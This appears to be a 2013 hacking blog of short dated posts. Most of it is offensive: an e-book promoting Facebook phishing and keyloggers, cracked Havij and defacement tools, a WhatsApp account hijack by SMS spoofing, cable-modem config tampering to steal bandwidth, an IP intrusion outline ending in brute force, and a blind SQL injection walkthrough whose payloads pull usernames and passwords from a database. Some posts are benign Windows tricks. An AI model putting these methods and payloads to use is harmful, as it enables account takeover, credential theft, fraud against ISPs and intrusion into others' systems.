Wednesday, July 10, 2013

Hacking Facebook Complete E-Book

Hack Fb Ebook

Table of Contents : 

1. Facebook Tips & Tricks     
1.1 Facebook Tips     
1.2. How to find Facebook Number   
1.3. How to access Facebook from G mail
1.4. Facebook Emotions codes
1.5. How to download Facebook in your PC…
 1.6. Download your Information 
1.7. Import your blog in Facebook 
    1.8. How to find if somebody hacked your Facebook account
1.9. How to change your name in Facebook
1.10. Export Email addresses of your Facebook account
1.11. How to create Facebook ID card  
    1.12. How to hide your Email address from Facebook apps
1.13. How to Delete and Terminate Facebook account 
1.14. How to Download Facebook photo album 
   1.15. How to add a forum (discussion board) to a page 
    1.16. Face book antivirus   

----------------------- Page 3-----------------------

1.17. How to alert Facebook fan page in your E-mail…  
 1.18. How to Show who is online on Facebook when you are in offline mode…
    1.19. How to send SMS using Facebook… 
   1.20. How to find new pages you might like  
  1.21. How to watch streaming TV on Facebook  
   1.22. How to create a map of your Facebook friend…     
1.23. Animated picture in Face book 
  1.24. Colored text, bold, underline, smiles in Facebook status…
    1.25. How to disable Facebook Timeline…    
1.26. How to disable Public search of your Facebook profile 
    1.27. How to Publish your Empty status
1.28. How to Surf Blocked Facebook 
2. Facebook Web Apps   
 2.1. How to Schedule Facebook massages Sendible     
 2.2. How to get Facebook updates on your Email  
  2.3. How to updates Facebook without using Face book    
 2.4. How to be notify when friend changes jobs     
2.5. How to view Facebook Profile History   

----------------------- Page 4-----------------------

    
2.6. How to Flip Facebook status updates     
2.7. How to find Shared videos on Facebook    
 2.8. Capture the wisdom of your social Network    
 2.9. Monitor your child Facebook activity     
 2.10. Manage your personal & professional image  
  2.11. How to track Facebook Activities  
  2.12. Create mosaics Profile picture on Facebook
2.13. Online store on Facebook    
  2.14. Online Face book Messenger…    
2.15. How to Analysis Facebook Fan page…     
 2.16. How to find who un friends you  
  2.17. How to download Videos from Facebook     
2.18. How to create slideshow of your Facebook album     
2.19. How to Create Custom Facebook tab
2.20. How to get Face book in Excel  
   2.21. How to connect Google docs to Facebook
 3. Facebook Software & Plugins     
 3.1. Facebook Color Changer   

----------------------- Page 5-----------------------

    3.2. Facebook adds blocker   
  3.3. How to connect Facebook, Twitter& Google 
3.4. Facebook Toggle all  
  3.5. How to Facebook Chat on your desktop Adium
    3.6. Facebook based web browser 
     3.7. Facebook E mail grabber   
 3.8. How to connect outlook to Facebook 
    4. Facebook Hacking & Security   
  4.1. Facebook phishing  
  4.2. Facebook Password Decryptor  
  4.3. Web browser Pass view … 
   4.4. How to Hack Facebook using Keylogger   
   4.5. How to Hack Password using Facebook Hacker  
    4.6. How to delete Your friend Account within 24 hour
    4.7. How to protect your Facebook account from Hacking   
  4.8. How to protect yourself from Keylogger & phishing attack

Download

 

Hack Speed Touch n Thomas Modems WiFi Easily

Hack wifi of modems

Speed Touch Modem is one of the powerful network modems of all and has ability to increase its limit range of wifi..
So, now I'm going to share a software through which it's wifi can be easily hacked and be enjoyed :D

Click Here

7 Most Important Addons For Hacker

7 Most Important Addons For Hacker

7 Most Important Addons For Hacker


*First of all always use Mozilla Firefox for Web App Pentesting & to use all these addons

[1] Tamper Data

Tamper Data is one of the most useful Addons for Pentesters it is used to view and modify HTTP/HTTPS headers and post parameters.Trace and time HTTP response or requests. Security test web applications by modifying POST parameters and Much More.



[2] Hack Bar

Hack Bar is one of the Best & Most wanted Simple security audit / Penetration test tool. Very Strongly Recommended you to Install & very useful. Useful in XSS, SQL Encoding/Decoding - MD5, SH1, Base64, Hexing, Splitting etc.



[4] User Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser. It can help you changing the User Agent to IE, Search Robots, I-Phone (I-OS), or you can also create your own User Agent. we've also Posted How to discover XSS through HTTP Header Injection & there we used User Agent Swithcer.




[5] Cookie Manager+

Cookies manager to view, edit and create, Inject Cookies etc. It also shows extra information about cookies, allows edit multiple cookies at once & backup/restore.


[6] HTTP-Fox

HttpFox monitors and analyzes all incoming and outgoing HTTP traffic between the browser and the web servers. It aims to bring the functionality known from tools like Http Watch or IE Inspector to the Firefox browser.

Information available per request includes:
- Request and response headers
- Sent and received cookies
- Querystring parameters
- POST parameters
- Response body


[7] Passive Recon

PassiveRecon provides information security professionals with the ability to perform "packetless" discovery of target resources utilizing publicly available information. Most Wanted Information Gathering Tool.

Programming Language Used in Top 10 most visited websites

Languages Used....


1. Google – Java (Web),  C++ (indexing)
2. Facebook – PHP
3. YouTube- Flash, Python, Java
4. Yahoo– PHP and Java
5. Microsoft Live.com– .NET
6. Baidu – Unknown
7. Wikipedia – PHP
8. Blogger – Java
9. MSN – .NET
10.Twitter – Ruby on Rails, Scala, Java

Saturday, June 29, 2013

Download Deface Page Creator 2013 Free Direct Link

Deface Pager Creator
A website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
The most common method of defacement is using SQL Injections to log on to administrator accounts. Defacements usually consist of an entire page. This page usually includes the defacer's pseudonym or "Hacking Codename." Sometimes, the Website Defacer makes fun of the system administrator for failing to maintain server security. Most times, the defacement is harmless, however, it can sometimes be used as a distraction to cover up more sinister actions such as uploading malware or deleting essential files from the server.

Sunday, June 2, 2013

Hack ur ISP n get high speeds…as much as u want


Hack ur ISP + MODEM n get highspeeds…as much as u want

Hack Your Modem and Increase YourDownload Speed

Hack Your Modem and Increase YourDownload Speed from 64Kbps to any Speed You Wish

Most of us will be feeling that thesurfing speed which is allocated by our ISP is not enough. People with 64Kbpswill think 128Kbps will be cool speed. People with 128Kbps will think 256Kbpswill be cool and so on

This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.

It is very much possible to do this.With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for youto grab vital information on how to accomplish this task. But this [tutorial]will no guarantee you 100% success.

Okay here we go. I’m going to try toexplain you as best as I can to accomplish re-configuring your SB5100, SB4100or SB3100 cable modem

Theory of cable modem working

All the cable modems when it boots upit will search for an “Image file” where in all configuration like your uploadspeed limit and download speed limit is defined. This “Image file” is stored inISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IPaddress and the Image file name to be downloaded. When the modem boots up itquery TFTP server and download Image file from [TFTP] [server] according tothis this our speed limits will be set.

Our Mission

Get this Image file from ISP`s TFTPserver, reconfigure it according to our need and force our modem to downloadthis file from our Computer rather than downloading it from our ISP`s TFTPserver.

1). Get cable [modems] MAC-Addreaa

You can either look at the back of themodem to get this MAC Address or you can logon to your Cable modem with yourWeb Browser hxxp://192.168.100.1/ . This is internal HTML pages stored withinyour DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even morevital information on configuration. Unless it is turned off by your ISP. Thisfeature might be totally turned off by your ISP.

2). Get your [ISP] TFTP server IPaddress

a) There’s a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem or Beginners can use DOCSIS Diagnosis utility

http://sourceforge.net/projects/docsis

Using the above tools you will get theinformation of your ISP`s TFTP server IP and the name of your “Image file”stored in that TFTP server

All your vital information is storedin this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting.40KB/s up and 250 KB/s down)

Among these, the one we need are:

Configuration [TFTP] [Server] =194.*.*..90 (replace this with yours throughout in the doc)

Configuration filename = isrr.bin(replace this with yours throughout in the doc)

And

IP fragments created = 0

IP address.10.$$$.$$$.$$$ =10.$$$.$$$.$$$

IP address.192.168.100.1 =192.168.100.1 (the IP address of the cable modem, (replace this with yoursthroughout in the doc)

IP-to-If-index.10.$$$.$$$.$$$ = 2

Suggestion: You can do this step bysniffing the modem i.e. “192.168.100.1″ when modem boots up. I never tried thismethod. Try your luck.

3) Download Image file from ISP`s TFTPserver.

For doing this got to your command prompt and use below commands with out quotes and bracket.

“C:\tftp -i GET ”

Okay now you got Image file from yourISP`s TFTP server.

4). Decrypt the Image file which youdownloaded from ISP`s TFTP server

For all you can use the DOCsis toolCode:

Code:

http://sourceforge.net/projects/docsis

to decode

5). Modify the Image file

Change your computer’s TCPconfiguration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTPserver)

Go to my network place and right click->properties

Select your LAN Card right click->property->Internet Protocol (TCP-IP) double click on it and change itto as following values

Configure your TPC’s TCP settings asbelow

IP: 194.*.*.90 (replace with the ISP’sTFTP server)

Netmask: 255.255.255.0

Gateway: 192.168.100.1 (replace withyour cable modem’s IP address)

Note: Gateway should be 192.168.100.1then only your modem can communicate with computer.

6). Encrypt the modified Image file(Save it using Docsis)

7). Host TFTP server in your computer

Download TFTP Server software and hostTFTP server in your computer

You can download TFTP server from:Code:

Code:

ftp://ftp.ida.net/pub/wireless/tftpd32.exe
. Put Image file in the basedirectory of your TFTP

Start TFTPD32 server. Go to Settingsand set the Security to None. Increase the timeout to 20secs and the MaxRetransmit to 6. Choose to translate UNIX filenames. Make sure it’s basedirectory point to where the isrr.bin is (i.e. the image file which youmodified). If you need to replicate a directory pathname along with the imagefile, then make a directory from root that corresponds to the image filepathname.

Restart your modem, and AS SOON as theSEND light goes solid, you should see a receive on your TFTP server i.e. yourPC

9). [Restart] your [modem]

10). Changer your PC’s IP back asgiven by ISP

11). OOPS Done. Start surfing withyour new speed

Note: This speed will remain sameuntil you restart your cable modem. So each time you reboot your modem you have to follow the steps 7 to 11 .

Googd Luck

Monday, May 20, 2013

Control PC using IP address Video Tutorial



Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password

Click Here TO Watch The Video Tutorial



Download All in One Pak Hack Tool

[Image: urdu1.jpg]
Pak Hacking Tool 
[Image: urdu2.jpg]
MD5
[Image: urdu3.jpg]
Email Spam Software
[Image: urdu4.jpg]
SQL Tool
[Image: urdu5.jpg]
Encryption n Decrypter
[Image: urdu6.jpg]
ASCII art
[Image: urdu7.jpg]
Ping Web
[Image: urdu8.jpg]
Google Dok Scanner

Requirement to run this software Microsoft Net.frame
.
For Download this App Click Here










Sunday, May 19, 2013

Lock Files Without any Software


 Powerful way of locking and hiding important files using a the following method. Follow the instructions to make you own Locker
( Without any software !! ) :
* Open notepad.
* Copy the following code in
notepad file :

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" goto
UNLOCK
if NOT EXIST Locker goto
MDLOCKER
:CONFIRM
echo Are you sure u want to
Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
attrib +h +s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock
folder
set/p "pass=>"
if NOT %pass%==LOCKME goto
FAIL
attrib -h -s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" Locker
echo Folder Unlocked
successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created
successfully
goto End
:End

  • * Change the word "LOCKME" in above code with your password.
  • * Save it as batch file ( with extension .bat ) For eg. Locker.bat
  •  Now you will see a batch file.
  • Double click it to create a folder locker ( A new folder named Locker would be formed at the same location )
  • Thats it you have now created your own locker and that too without using any software !
  • * Brings all the files you want to
  • hide in the locker folder.
  • * Double click the batch ( As
  • created above ) file to lock the
  • folder namely Locker

If you want to unlock your files, simple double click the batch file again and you would be prompted for password ( In DOS window ). Enter the password and enjoy access to the folder.
Lock Files on Windows Without Using Any Software

Enjoy!!!!


Saturday, May 18, 2013

Hack Whatsapp mobile application Free

Follow the steps below carefully Trick 1 : Use Whatsapp With Someone Else's Number !!! This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. 1.Install WhatsApp on your device WhatsApp now starts a counter where it sends a verification message to its servers. 2.Block the messeage service it can be blocked by changing the message center number or pushing the phone into Airplane mode. 3.WhatsApp now offers an alternative method of verification Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server. 4.Now You have to do sms Spoofing You can do it using this App For Android Check your outbox and copy the message details into the spoofer application and send the spoofed verification. - Use this App and Send sms: To: +447900347295 From: +(Country code) (victims mobile number) Message: (your email address) 5. You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number and You have successfully hacked their whatsapp account !! Trick 2 : How to get whats app free for 10 years : ..::Requirement ­s ::.. 1. Iphone or Ipad 2.Android or Nokia Device with whatsapp ..:: Procedure ::.. 1. Remove whatsapp from your phone and take help from your friend who have owned Iphone or Ipad. 2. Ask him to register whatsapp with your number. 3. You will get an verification code on your phone,tell him verification code received on your number and enter it on his iPhone. 4.After you have done all that steps whatsapp will start on your friend’s iPhone,just check account info and it will be updated to 2022. 5.Ask your friend to delete it and install the latest version on your phone and check its expiration date.

Friday, May 17, 2013

Download Free Havij Pro Cracked Version Direct Link

Havij
Havij



Free Download Havij v1.17 Pro Cracked Version

Click Here

Havij v1.16 Pro Portable Full Version 

Click Here

Thursday, May 16, 2013

BLIND SQLI!!!!

Blind Sqli
Blind Sqli


What is Blind SQLi

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established

Blind SQLi Tutorial

Let’s Start…………

Suppose That You want to Hack This website with Blind SQLi

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack

http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test

http://www.site.com/index.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend 
i.e. http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull
characters from that.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii()
converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter
we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have
'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best,
but i'm doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this Tutorial.
Have FUN!

Hacking Mobile Using Bluetooth 2013


Super Bluetooth Hack
Super Bluetooth Hack


Note : Only For Educational Purpose.>!!!

Super Bluetooth hack 2009 is one of the most downloaded Bluetooth
hacking tools. Super bluetooth hack 2009 is used for mobile based
Symbian operating system to hack & manage any mobile near you which is vulnerable to Bluetooth hacking attack
.
Download it from Mobicreed..

How To Install Super Bluetooth Hack 2009

1) Download to PC
2) Transfer it to your Bluetooth enabled mobile.
3) Run the Installer (Remember, You must have Java enabled phone for installing it)
4) He finds it and you will be able to run program
5) Select the language and configure it.
6) Click > Connection
7) Click > Search Devices
 Choose the “Victim”
9) And start managing with following hacks mentioned with Bluetooth.
:Enjoy:

DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7...

Main Difference : 
Intel
Intel

-> Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 3-4 MB Cache
* 32 nm Silicon (less heat and
energy)
-> Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not
used)
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and
energy)
-> Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not
used)
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and
energy)

About XSS or Cross Site Scripting




Basic Knowledge in Hypertext markup language (HTML)

Strong Knowledge of JavaScript

Basic knowledge of HTTP client server Architecure

Basic knowledge of (PHP, ASP.NET)


What is cross site scripting XSS?

Cross site scripting XSS is one of the common website security flaws that allow a Hacker | Attacker to run his client side scripts like JavaScript’s payload into website that is viewed by others. with the cross site scripting bug may be hacker bypass access control .if hacker successfully exploit cross site scripting XSS so then hacker easily do steal account, phishing attack and many more. In simple word with the help of cross site scripting XSS hacker inject his malicious JavaScript payload into website then a user visit the website link then it will execute the malicious JavaScript payload.
Types of Cross site scripting XSS:

There are two types of Cross site scripting XSS

1. Persistent XSS ( Stored XSS)

2. Non persistent XSS ( Reflective XSS)

noman ramzan cross site scripting

Persistent Cross site scripting XSS:

The persistent XSS also known as stored XSS. As shown with the name of stored XSS and this Cross site scripting XSS stored somewhere. When attacker used Cross site scripting XSS malicious code inject into the website and then this payload saved by the server in the database and then is will run in the normal link of website.


Example of persistent XSS

There are so many website which support the forum and where the user register and ask a question like answer.yahoo.com. if the Hacker post a message with the malicious JavaScript payload then if the server fail to sanitize the payload and then code execute easily. So whenever user read to this post and open a link then inject code cookie stealing of a user and then hacker easily bypass his account.

NON persistent Cross site scripting XSS:

Non persistent also known as reflected XSS. This is very common vulnerability discover by security Researchers. And this is find in the search filed like search, contact page and subscribe email. in this attack hacker inject payload will send to the server with the request of HTTP request and then server embed with html file and then return HTTPresponse to the browser. When the browser execute the file and then it’s also execute
the scripts. so it’s a reflective XSS.


DOM based Cross site scripting XSS:


In the addition to these types DOM based XSS also third type of cross site scripting XSS. This is very important part of XSS. Most of the big website like Microsoft, PayPal, Nokia, eBay and many more website. 

Convert Text to Speech Tutorial

Convert Text to Speech
Convert Text to Speech


Convert text to speech without
any software !!!
1. Open notepad and copy this
2. Dim msg, sapi
msg=InputBox("E ­ nter your
text","Talk it")
Set sapi=CreateObje ­ ct
("sapi.spvoic e")
sapi.Speak msg
'+-> VictimBoy <-+
3. Now save this file with any
name with .vbs extension.
This creates a VBscript file. When
you open this file, it prompts for
text. Enter your text and click
OK .
WoW!! Now you can hear it ..Enjoy .. !!